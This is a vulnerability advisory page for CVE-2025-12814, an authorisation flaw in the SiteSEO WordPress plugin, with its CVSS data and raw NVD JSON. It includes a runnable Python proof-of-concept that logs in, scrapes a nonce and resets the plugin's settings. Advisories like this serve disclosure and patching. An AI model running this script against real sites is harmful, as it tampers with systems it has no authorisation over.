Security Vulnerability Report
CVE-2025-12814 CVSS 5.3 MEDIUM

CVE-2025-12814

Published: 2025-11-19 06:15:47
Last Modified: 2026-04-15 00:35:42

Description

The SiteSEO – SEO Simplified plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect capability check on the siteseo_reset_settings function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, who have been granted access to at least one SiteSEO setting capability, to reset the plugin's settings.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SiteSEO plugin for WordPress <= 1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re
import sys

import requests

# CVE-2025-12814 PoC - SiteSEO Plugin Unauthorized Settings Reset
# Target: WordPress site with SiteSEO plugin <= 1.3.2


def exploit_siteseo_reset(target_url, username, password):
    """
    Exploit the incorrect capability check vulnerability in SiteSEO plugin.

    This PoC demonstrates how an authenticated user with limited privileges
    can reset all SiteSEO plugin settings.
    """
    session = requests.Session()

    # Step 1: Authenticate with WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data,
                            cookies={'wordpress_test_cookie': 'WP+Cookie+check'})

    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed")
        return False

    print("[+] Authentication successful")

    # Step 2: Get WordPress nonce for AJAX request
    # In real attack, nonce can be obtained from plugin's admin page or other sources
    admin_url = f"{target_url}/wp-admin/admin.php?page=siteseo"
    admin_response = session.get(admin_url)

    # Extract nonce from page source (simplified)
    nonce_match = re.search(r'nonce.*?([a-f0-9]{10})', admin_response.text)
    nonce = nonce_match.group(1) if nonce_match else 'your_nonce_here'

    # Step 3: Send AJAX request to reset SiteSEO settings
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'siteseo_reset_settings',
        'nonce': nonce,
        'siteseo_reset_settings': '1'
    }
    response = session.post(ajax_url, data=exploit_data)

    if response.status_code == 200 and 'success' in response.text.lower():
        print("[+] SiteSEO settings have been reset successfully")
        print("[*] The plugin settings are now at default values")
        return True
    else:
        print("[-] Exploitation failed or settings already reset")
        return False


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://example.com subscriber password123")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_siteseo_reset(target, user, pwd)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12814", "sourceIdentifier": "[email protected]", "published": "2025-11-19T06:15:46.617", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SiteSEO – SEO Simplified plugin for WordPress is vulnerable to unauthorized modification of data due to n incorrect capability check on the siteseo_reset_settings function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, who have been granted access to at least on SiteSEO setting capability, to reset the plugin's settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/siteseo/tags/1.3.2/main/ajax.php#L90", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397272%40siteseo&new=3397272%40siteseo&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a376cafb-656c-4fe1-b5c1-c7e38dc5040e?source=cve", "source": "[email protected]"}]}}